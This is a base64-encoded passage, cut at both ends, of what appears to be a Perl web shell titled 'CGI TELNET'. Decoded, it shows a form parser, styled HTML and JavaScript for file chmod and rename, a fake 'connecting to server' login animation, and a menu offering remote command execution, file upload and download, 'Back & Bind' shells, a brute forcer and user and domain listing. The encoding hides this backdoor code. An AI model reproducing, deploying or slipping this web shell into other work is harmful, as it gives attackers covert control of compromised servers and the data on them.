nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsNCgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7DQoJCQkkaW57JGtleX0gLj0gJHZhbDsNCgkJfQ0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgUGFnZSBIZWFkZXINCiMgQXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KCSRFbmNvZGVkQ3VycmVudERpciA9ICRDdXJyZW50RGlyOw0KCSRFbmNvZGVkQ3VycmVudERpciA9fiBzLyhbXmEtekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJbXkgJGRpciA9JEN1cnJlbnREaXI7DQoJJGRpcj1+IHMvXFwvXFxcXC9nOw0KCXByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOw0KCXByaW50IDw8RU5EOw0KPGh0bWw+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4NCjx0aXRsZT5DR0kgVEVMTkVUPC90aXRsZT4NCg0KJEh0bWxNZXRhSGVhZGVyDQoNCjwvaGVhZD4NCjxzdHlsZT4NCmJvZHl7DQpmb250OiAxMHB0IFZlcmRhbmE7DQp9DQp0ciB7DQpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLUxFRlQ6ICAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsNCmNvbG9yOiAjZmY5OTAwOw0KfQ0KdGQgew0KQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItVE9QOiAgICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7DQpjb2xvcjogIzJCQThFQzsNCmZvbnQ6IDEwcHQgVmVyZGFuYTsNCn0NCg0KdGFibGUgew0KQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItVE9QOiAgICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7DQpCQUNLR1JPVU5ELUNPTE9SOiAjMTExOw0KfQ0KDQoNCmlucHV0IHsNCkJPUkRFUi1SSUdIVDogICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1CT1RUT006ICMzZTNlM2UgMXB4IHNvbGlkOw0KQkFDS0dST1VORC1DT0xPUjogQmxhY2s7DQpmb250OiAxMHB0IFZlcmRhbmE7DQpjb2xvcjogI2ZmOTkwMDsNCn0NCg0KaW5wdXQuc3VibWl0IHsNCnRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsNCmNvbG9yOiAjRkZGRkZGOw0KYm9yZGVyLWNvbG9yOiAjMDA5OTAwOw0KfQ0KDQpjb2RlIHsNCmJvcmRlcgkJCTogZGFzaGVkIDBweCAjMzMzOw0KQkFDS0dST1VORC1DT0xPUjogQmxhY2s7DQpmb250OiAxMHB0IFZlcmRhbmEgYm9sZDsNCmNvbG9yOiB3aGlsZTsNCn0NCg0KcnVuIHsNCmJvcmRlcgkJCTogZGFzaGVkIDBweCAjMzMzOw0KZm9udDogMTBwdCBWZXJkYW5hIGJvbGQ7DQpjb2xvcjogI0ZGMDBBQTsNCn0NCg0KdGV4dGFyZWEgew0KQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItVE9QOiAgICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7DQpCQUNLR1JPVU5ELUNPTE9SOiAjMWIxYjFiOw0KZm9udDogRml4ZWRzeXMgYm9sZDsNCmNvbG9yOiAjYWFhOw0KfQ0KQTpsaW5rIHsNCglDT0xPUjogIzJCQThFQzsgVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOnZpc2l0ZWQgew0KCUNPTE9SOiAjMkJBOEVDOyBURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkE6aG92ZXIgew0KCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsNCgljb2xvcjogI2ZmOTkwMDsgVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmFjdGl2ZSB7DQoJY29sb3I6IFJlZDsgVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQoNCi5saXN0ZGlyIHRyOmhvdmVyew0KCWJhY2tncm91bmQ6ICM0NDQ7DQp9DQoubGlzdGRpciB0cjpob3ZlciB0ZHsNCgliYWNrZ3JvdW5kOiAjNDQ0Ow0KCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsNCgljb2xvcjogI0ZGRkZGRjsgVEVYVC1ERUNPUkFUSU9OOiBub25lOw0KfQ0KLm5vdGxpbmV7DQoJYmFja2dyb3VuZDogIzExMTsNCn0NCi5saW5lew0KCWJhY2tncm91bmQ6ICMyMjI7DQp9DQo8L3N0eWxlPg0KPHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQpmdW5jdGlvbiBjaG1vZF9mb3JtKGksZmlsZSkNCnsNCgkvKnZhciBhamF4PSdhamF4X1Bvc3REYXRhKCJGb3JtUGVybXNfJytpKyciLCIkU2NyaXB0TG9jYXRpb24iLCJSZXNwb25zZURhdGEiKTsgcmV0dXJuIGZhbHNlOyc7Ki8NCgl2YXIgYWpheD0iIjsNCglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZVBlcm1zXyIraSkuaW5uZXJIVE1MPSI8Zm9ybSBuYW1lPUZvcm1QZXJtc18iICsgaSsgIiBhY3Rpb249JycgbWV0aG9kPSdQT1NUJz48aW5wdXQgaWQ9dGV4dF8iICsgaSArICIgIG5hbWU9Y2htb2QgdHlwZT10ZXh0IHNpemU9NSAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBjbGFzcz0nc3VibWl0JyBvbmNsaWNrPSciICsgYWpheCArICInIHZhbHVlPU9LPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOw0KCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJ0ZXh0XyIgKyBpKS5mb2N1cygpOw0KfQ0KZnVuY3Rpb24gcm1fY2htb2RfZm9ybShyZXNwb25zZSxpLHBlcm1zLGZpbGUpDQp7DQoJcmVzcG9uc2UuaW5uZXJIVE1MID0gIjxzcGFuIG9uY2xpY2s9XFxcImNobW9kX2Zvcm0oIiArIGkgKyAiLCciKyBmaWxlKyAiJylcXFwiID4iKyBwZXJtcyArIjwvc3Bhbj48L3RkPiI7DQp9DQpmdW5jdGlvbiByZW5hbWVfZm9ybShpLGZpbGUsZikNCnsNCgl2YXIgYWpheD0iIjsNCglmLnJlcGxhY2UoL1xcXFwvZywiXFxcXFxcXFwiKTsNCgl2YXIgYmFjaz0icm1fcmVuYW1lX2Zvcm0oIitpKyIsXFxcIiIrZmlsZSsiXFxcIixcXFwiIitmKyJcXFwiKTsgcmV0dXJuIGZhbHNlOyI7DQoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9Ijxmb3JtIG5hbWU9Rm9ybVBlcm1zXyIgKyBpKyAiIGFjdGlvbj0nJyBtZXRob2Q9J1BPU1QnPjxpbnB1dCBpZD10ZXh0XyIgKyBpICsgIiAgbmFtZT1yZW5hbWUgdHlwZT10ZXh0IHZhbHVlPSAnIitmaWxlKyInIC8+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBhamF4ICsgIicgdmFsdWU9T0s+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBiYWNrICsgIicgdmFsdWU9Q2FuY2VsPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOw0KCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJ0ZXh0XyIgKyBpKS5mb2N1cygpOw0KfQ0KZnVuY3Rpb24gcm1fcmVuYW1lX2Zvcm0oaSxmaWxlLGYpDQp7DQoJaWYoZj09J2YnKQ0KCXsNCgkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9IjxhIGhyZWY9Jz9hPWNvbW1hbmQmZD0kZGlyJmM9ZWRpdCUyMCIrZmlsZSsiJTIwJz4iICtmaWxlKyAiPC9hPiI7DQoJfWVsc2UNCgl7DQoJCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJGaWxlXyIraSkuaW5uZXJIVE1MPSI8YSBocmVmPSc/YT1ndWkmZD0iK2YrIic+WyAiICtmaWxlKyAiIF08L2E+IjsNCgl9DQp9DQo8L3NjcmlwdD4NCjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5mb2N1cygpIiBiZ2NvbG9yPSIjMGMwYzBjIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1hcmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiPg0KPGNlbnRlcj48Y29kZT4NCjx0YWJsZSBib3JkZXI9IjEiIHdpZHRoPSIxMDAlIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjIiPg0KPHRyPg0KCTx0ZCBhbGlnbj0iY2VudGVyIiByb3dzcGFuPTI+DQoJCTxiPjxmb250IHNpemU9IjUiPiRFZGl0UGVyc2lvbjwvZm9udD48L2I+DQoJPC90ZD4NCg0KCTx0ZD4NCg0KCQk8Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4kRU5WeyJTRVJWRVJfU09GVFdBUkUifTwvZm9udD4NCgk8L3RkPg0KCTx0ZD5TZXJ2ZXIgSVA6PGZvbnQgY29sb3I9IiNjYzAwMDAiPiAkRU5WeydTRVJWRVJfQUREUid9PC9mb250PiB8IFlvdXIgSVA6IDxmb250IGNvbG9yPSIjMDAwMDAwIj4kRU5WeydSRU1PVEVfQUREUid9PC9mb250Pg0KCTwvdGQ+DQoNCjwvdHI+DQoNCjx0cj4NCjx0ZCBjb2xzcGFuPSIzIj48Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4NCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbiI+SG9tZTwvYT4gfCANCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWNvbW1hbmQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkNvbW1hbmQ8L2E+IHwNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWd1aSZkPSRFbmNvZGVkQ3VycmVudERpciI+R1VJPC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCANCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5Eb3dubG9hZCBGaWxlPC9hPiB8DQoNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWJhY2tiaW5kIj5CYWNrICYgQmluZDwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9YnJ1dGVmb3JjZXIiPkJydXRlIEZvcmNlcjwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Y2hlY2tsb2ciPkNoZWNrIExvZzwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG9tYWluc3VzZXIiPkRvbWFpbnMvVXNlcnM8L2E+IHwNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWxvZ291dCI+TG9nb3V0PC9hPiB8DQo8YSB0YXJnZXQ9J19ibGFuaycgaHJlZj0iIyI+SGVscDwvYT4NCg0KPC9mb250PjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjxmb250IGlkPSJSZXNwb25zZURhdGEiIGNvbG9yPSIjZmY5OWNjIiA+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9naW5TY3JlZW4NCnsNCg0KCXByaW50IDw8RU5EOw0KPHByZT48c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+DQpUeXBpbmdUZXh0ID0gZnVuY3Rpb24oZWxlbWVudCwgaW50ZXJ2YWwsIGN1cnNvciwgZmluaXNoZWRDYWxsYmFjaykgew0KICBpZigodHlwZW9mIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkID09ICJ1bmRlZmluZWQiKSB8fCAodHlwZW9mIGVsZW1lbnQuaW5uZXJIVE1MID09ICJ1bmRlZmluZWQiKSkgew0KICAgIHRoaXMucnVubmluZyA9IHRydWU7CS8vIE5ldmVyIHJ1bi4NCiAgICByZXR1cm47DQogIH0NCiAgdGhpcy5lbGVtZW50ID0gZWxlbWVudDsNCiAgdGhpcy5maW5pc2hlZENhbGxiYWNrID0gKGZpbmlzaGVkQ2FsbGJhY2sgPyBmaW5pc2hlZENhbGxiYWNrIDogZnVuY3Rpb24oKSB7IHJldHVybjsgfSk7DQogIHRoaXMuaW50ZXJ2YWwgPSAodHlwZW9mIGludGVydmFsID09ICJ1bmRlZmluZWQiID8gMTAwIDogaW50ZXJ2YWwpOw0KICB0aGlzLm9yaWdUZXh0ID0gdGhpcy5lbGVtZW50LmlubmVySFRNTDsNCiAgdGhpcy51bnBhcnNlZE9yaWdUZXh0ID0gdGhpcy5vcmlnVGV4dDsNCiAgdGhpcy5jdXJzb3IgPSAoY3Vyc29yID8gY3Vyc29yIDogIiIpOw0KICB0aGlzLmN1cnJlbnRUZXh0ID0gIiI7DQogIHRoaXMuY3VycmVudENoYXIgPSAwOw0KICB0aGlzLmVsZW1lbnQudHlwaW5nVGV4dCA9IHRoaXM7DQogIGlmKHRoaXMuZWxlbWVudC5pZCA9PSAiIikgdGhpcy5lbGVtZW50LmlkID0gInR5cGluZ3RleHQiICsgVHlwaW5nVGV4dC5jdXJyZW50SW5kZXgrKzsNCiAgVHlwaW5nVGV4dC5hbGwucHVzaCh0aGlzKTsNCiAgdGhpcy5ydW5uaW5nID0gZmFsc2U7DQogIHRoaXMuaW5UYWcgPSBmYWxzZTsNCiAgdGhpcy50YWdCdWZmZXIgPSAiIjsNCiAgdGhpcy5pbkhUTUxFbnRpdHkgPSBmYWxzZTsNCiAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiI7DQp9DQpUeXBpbmdUZXh0LmFsbCA9IG5ldyBBcnJheSgpOw0KVHlwaW5nVGV4dC5jdXJyZW50SW5kZXggPSAwOw0KVHlwaW5nVGV4dC5ydW5BbGwgPSBmdW5jdGlvbigpIHsNCiAgZm9yKHZhciBpID0gMDsgaSA8IFR5cGluZ1RleHQuYWxsLmxlbmd0aDsgaSsrKSBUeXBpbmdUZXh0LmFsbFtpXS5ydW4oKTsNCn0NClR5cGluZ1RleHQucHJvdG90eXBlLnJ1biA9IGZ1bmN0aW9uKCkgew0KICBpZih0aGlzLnJ1bm5pbmcpIHJldHVybjsNCiAgaWYodHlwZW9mIHRoaXMub3JpZ1RleHQgPT0gInVuZGVmaW5lZCIpIHsNCiAgICBzZXRUaW1lb3V0KCJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnIiArIHRoaXMuZWxlbWVudC5pZCArICInKS50eXBpbmdUZXh0LnJ1bigpIiwgdGhpcy5pbnRlcnZhbCk7CS8vIFdlIGhhdmVuJ3QgZmluaXNoZWQgbG9hZGluZyB5ZXQuICBIYXZlIHBhdGllbmNlLg0KICAgIHJldHVybjsNCiAgfQ0KICBpZih0aGlzLmN1cnJlbnRUZXh0ID09ICIiKSB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MID0gIiI7DQovLyAgdGhpcy5vcmlnVGV4dCA9IHRoaXMub3JpZ1RleHQucmVwbGFjZSgvPChbXjxdKSo+LywgIiIpOyAgICAgLy8gU3RyaXAgSFRNTCBmcm9tIHRleHQuDQogIGlmKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCkgew0KICAgIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI8IiAmJiAhdGhpcy5pblRhZykgew0KICAgICAgdGhpcy50YWdCdWZmZXIgPSAiPCI7DQogICAgICB0aGlzLmluVGFnID0gdHJ1ZTsNCiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsNCiAgICAgIHRoaXMucnVuKCk7DQogICAgICByZXR1cm47DQogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI+IiAmJiB0aGlzLmluVGFnKSB7DQogICAgICB0aGlzLnRhZ0J1ZmZlciArPSAiPiI7DQogICAgICB0aGlzLmluVGFnID0gZmFsc2U7DQogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMudGFnQnVmZmVyOw0KICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOw0KICAgICAgdGhpcy5ydW4oKTsNCiAgICAgIHJldHVybjsNCiAgICB9IGVsc2UgaWYodGhpcy5pblRhZykgew0KICAgICAgdGhpcy50YWdCdWZmZXIgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSBpZih0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKSA9PSAiJiIgJiYgIXRoaXMuaW5IVE1MRW50aXR5KSB7DQogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgPSAiJiI7DQogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IHRydWU7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSBpZih0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKSA9PSAiOyIgJiYgdGhpcy5pbkhUTUxFbnRpdHkpIHsNCiAgICAgIHRoaXMuSFRNTEVudGl0eUJ1ZmZlciArPSAiOyI7DQogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IGZhbHNlOw0KICAgICAgdGhpcy5jdXJyZW50VGV4dCArPSB0aGlzLkhUTUxFbnRpdHlCdWZmZXI7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSBpZih0aGlzLmluSFRNTEVudGl0eSkgew0KICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyICs9IHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpOw0KICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOw0KICAgICAgdGhpcy5ydW4oKTsNCiAgICAgIHJldHVybjsNCiAgICB9IGVsc2Ugew0KICAgICAgdGhpcy5jdXJyZW50VGV4dCArPSB0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKTsNCiAgICB9DQogICAgdGhpcy5lbGVtZW50LmlubmVySFRNTCA9IHRoaXMuY3VycmVudFRleHQ7DQogICAgdGhpcy5lbGVtZW50LmlubmVySFRNTCArPSAodGhpcy5jdXJyZW50Q2hhciA8IHRoaXMub3JpZ1RleHQubGVuZ3RoIC0gMSA/ICh0eXBlb2YgdGhpcy5jdXJzb3IgPT0gImZ1bmN0aW9uIiA/IHRoaXMuY3Vyc29yKHRoaXMuY3VycmVudFRleHQpIDogdGhpcy5jdXJzb3IpIDogIiIpOw0KICAgIHRoaXMuY3VycmVudENoYXIrKzsNCiAgICBzZXRUaW1lb3V0KCJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnIiArIHRoaXMuZWxlbWVudC5pZCArICInKS50eXBpbmdUZXh0LnJ1bigpIiwgdGhpcy5pbnRlcnZhbCk7DQogIH0gZWxzZSB7DQoJdGhpcy5jdXJyZW50VGV4dCA9ICIiOw0KCXRoaXMuY3VycmVudENoYXIgPSAwOw0KICAgICAgICB0aGlzLnJ1bm5pbmcgPSBmYWxzZTsNCiAgICAgICAgdGhpcy5maW5pc2hlZENhbGxiYWNrKCk7DQogIH0NCn0NCjwvc2NyaXB0Pg0KPC9wcmU+DQoNCg0KPHRhYmxlIGFsaWduPSJjZW50ZXIiIGJvcmRlcj0iMSIgd2lkdGg9IjYwMCIgaGVpZ2g+DQo8dGJvZHk+PHRyPg0KPHRkIHZhbGlnbj0idG9wIiBiYWNrZ3JvdW5kPSJodHRwOi8vZGwuZHJvcGJveC5jb20vdS8xMDg2MDA1MS9pbWFnZXMvbWF0cmFuLmdpZiI+PHAgaWQ9ImhhY2siIHN0eWxlPSJtYXJnaW4tbGVmdDogM3B4OyI+DQo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+IFBsZWFzZSBXYWl0IC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+IDxicj4NCg0KPGZvbnQgY29sb3I9IiMwMDk5MDAiPiBUcnlpbmcgY29ubmVjdCB0byBTZXJ2ZXIgLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLjwvZm9udD48YnI+DQo8Zm9udCBjb2xvcj0iI0YwMDAwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPn5cJDwvZm9udD4gQ29ubmVjdGVkICEgPC9mb250Pjxicj4NCjxmb250IGNvbG9yPSIjMDA5OTAwIj48Zm9udCBjb2xvcj0iI0ZGRjAwMCI+JFNlcnZlck5hbWV+PC9mb250PiBDaGVja2luZyBTZXJ2ZXIgLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLjwvZm9udD4gPGJyPg0KDQo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPiRTZXJ2ZXJOYW1lfjwvZm9udD4gVHJ5aW5nIGNvbm5lY3QgdG8gQ29tbWFuZCAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPg0KDQo8Zm9udCBjb2xvcj0iI0YwMDAwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPiRTZXJ2ZXJOYW1lfjwvZm9udD5cJCBDb25uZWN0ZWQgQ29tbWFuZCEgPC9mb250Pjxicj4NCjxmb250IGNvbG9yPSIjMDA5OTAwIj48Zm9udCBjb2xvcj0iI0ZGRjAwMCI+JFNlcnZlck5hbWV+PGZvbnQgY29sb3I9IiNGMDAwMDAiPlwkPC9mb250PjwvZm9udD4gT0tFIENPSyAhISE8L2ZvbnQ+DQo8L3RyPg0KPC90Ym9keT48L3RhYmxlPg0KPGJyPg0KDQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+DQpuZXcgVHlwaW5nVGV4dChkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaGFjayIpLCAzMCwgZnVuY3Rpb24oaSl7IHZhciBhciA9IG5ldyBBcnJheSgiXyIsIiIpOyByZXR1cm4gIiAiICsgYXJbaS5sZW5ndGggJSBhci5sZW5ndGhdOyB9KTsNClR5cGluZ1RleHQucnVuQWxsKCk7DQoNCjwvc2NyaXB0Pg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQWRkIGh0bWwgc3BlY2lhbCBjaGFycw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEh0bWxTcGVjaWFsQ2hhcnMoJCl7DQoJbXkgJHRleHQgPSBzaGlmdDsNCgkkdGV4dCA9fiBzLyYvJmFtcDsvZzsNCgkkdGV4dCA9fiBzLyIvJnF1b3Q7L2c7DQoJJHRleHQgPX4gcy8nLyYjMDM5Oy9nOw0KCSR0ZXh0ID1+IHMvPC8mbHQ7L2c7DQoJJHRleHQgPX4gcy8+LyZndDsvZzsNCglyZXR1cm4gJHRleHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIEFkZCBsaW5rIGZvciBkaXJlY3RvcnkNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBBZGRMaW5rRGlyKCQpDQp7DQoJbXkgJGFjPXNoaWZ0Ow0KCW15IEBkaXI9KCk7DQoJaWYoJFdpbk5UKQ0KCXsNCgkJQGRpcj1zcGxpdCgvXFwvLCRDdXJyZW50RGlyKTsNCgl9ZWxzZQ0KCXsNCgkJQGRpcj1zcGxpdCgiLyIsJnRyaW0oJEN1cnJlbnREaXIpKTsNCgl9DQoJbXkgJHBhdGg9IiI7DQoJbXkgJHJlc3VsdD0iIjsNCglmb3JlYWNoIChAZGlyKQ0KCXsNCgkJJHBhdGggLj0gJF8uJFBhdGhTZXA7DQoJCSRyZXN1bHQuPSI8YSBocmVmPSc/YT0iLiRhYy4iJmQ9Ii4kcGF0aC4iJz4iLiRfLiRQYXRoU2VwLiI8L2E+IjsNCgl9DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXB